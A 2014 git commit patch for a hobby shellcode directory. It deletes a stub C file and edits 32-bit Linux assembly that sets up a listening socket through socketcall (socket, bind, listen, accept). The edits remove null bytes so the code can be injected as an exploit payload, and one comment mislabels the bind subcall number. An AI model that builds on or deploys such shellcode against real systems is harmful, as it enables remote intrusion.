From 3cf4e37c624fe1ac16ed11eb9ad167941b074e23 Mon Sep 17 00:00:00 2001
From: toni <matzeton@googlemail.com>
Date: Sun, 9 Nov 2014 07:59:11 +0100
Subject: - removed \x00 in socket.asm - exploit.sh -> socket.o

---
 shellcode/simple2.c  |  9 ---------
 shellcode/socket.asm | 17 +++++++++++------
 2 files changed, 11 insertions(+), 15 deletions(-)
 delete mode 100644 shellcode/simple2.c

(limited to 'shellcode')

diff --git a/shellcode/simple2.c b/shellcode/simple2.c
deleted file mode 100644
index 341b2de..0000000
--- a/shellcode/simple2.c
+++ /dev/null
@@ -1,9 +0,0 @@
-#include <stdio.h>
-#include <stdlib.h>
-
-int _start(void) {
-  while (1) {
-    //printf("Shellcode!\n");
-  }
-  return (0);
-}
diff --git a/shellcode/socket.asm b/shellcode/socket.asm
index 76b8103..1cbd9d4 100644
--- a/shellcode/socket.asm
+++ b/shellcode/socket.asm
@@ -3,9 +3,10 @@ BITS 32
 
 ; socket()
 xor		eax,eax		; zero out eax
+xor		ebx,ebx		;   "   "  ebx
 push		eax		; push 0x0 on the stack: arg3(protocol) -> 0
-mov		ebx,0x01	; socket sub-syscall: 0x01 -> socket()
-push		0x01		; socket type: 0x01 -> SOCK_STREAM
+mov		bl,0x1		; socket sub-syscall: 0x01 -> socket()
+push		ebx		; socket type: 0x01 -> SOCK_STREAM
 push		0x02		; socket domain: 0x02 -> AF_INET
 mov		ecx,esp		; let ecx point to our structure above
 mov		al,0x66		; socketcall syscall 0x66
@@ -25,7 +26,8 @@ push		edx		; arg1: push sockfd
 ; arg2
 mov		ecx,esp		; move stack pointer to reg (conform to socketcall)
 ; arg1
-mov		ebx,0x02	; set socket subcall to 0x03 (bind)
+xor		ebx,ebx
+mov		bl,0x2		; set socket subcall to 0x03 (bind)
 mov		al,0x66		; socketcall syscall
 int		0x80		; let the kernel do the stuff
 
@@ -35,7 +37,8 @@ push		eax		; backlog
 push		edx		; sockfd
 mov		ecx,esp		; save stackptr
 mov		al,0x66		; socketcall()
-mov		ebx,0x4		; socketcall 0x4 -> listen()
+xor		ebx,ebx
+mov		bl,0x4		; socketcall 0x4 -> listen()
 int		0x80		; kernel mode
 
 ; accept()
@@ -49,7 +52,8 @@ push		esp		; pointer to sock addrlen
 push 		ecx		; push sockaddr_in
 push		edx		; sockfd
 mov		ecx,esp
-mov		ebx,0x5
+xor		ebx,ebx
+mov		bl,0x5
 mov		al,0x66
 int		0x80
 
@@ -78,5 +82,6 @@ int		0x80
 
 ; exit()
 mov		al,0x1		; exit syscall
-mov		ebx,0x42	; return code
+xor		ebx,ebx
+mov		bl,0x42		; return code
 int		0x80		; kernel mode
-- 
cgit v1.2.3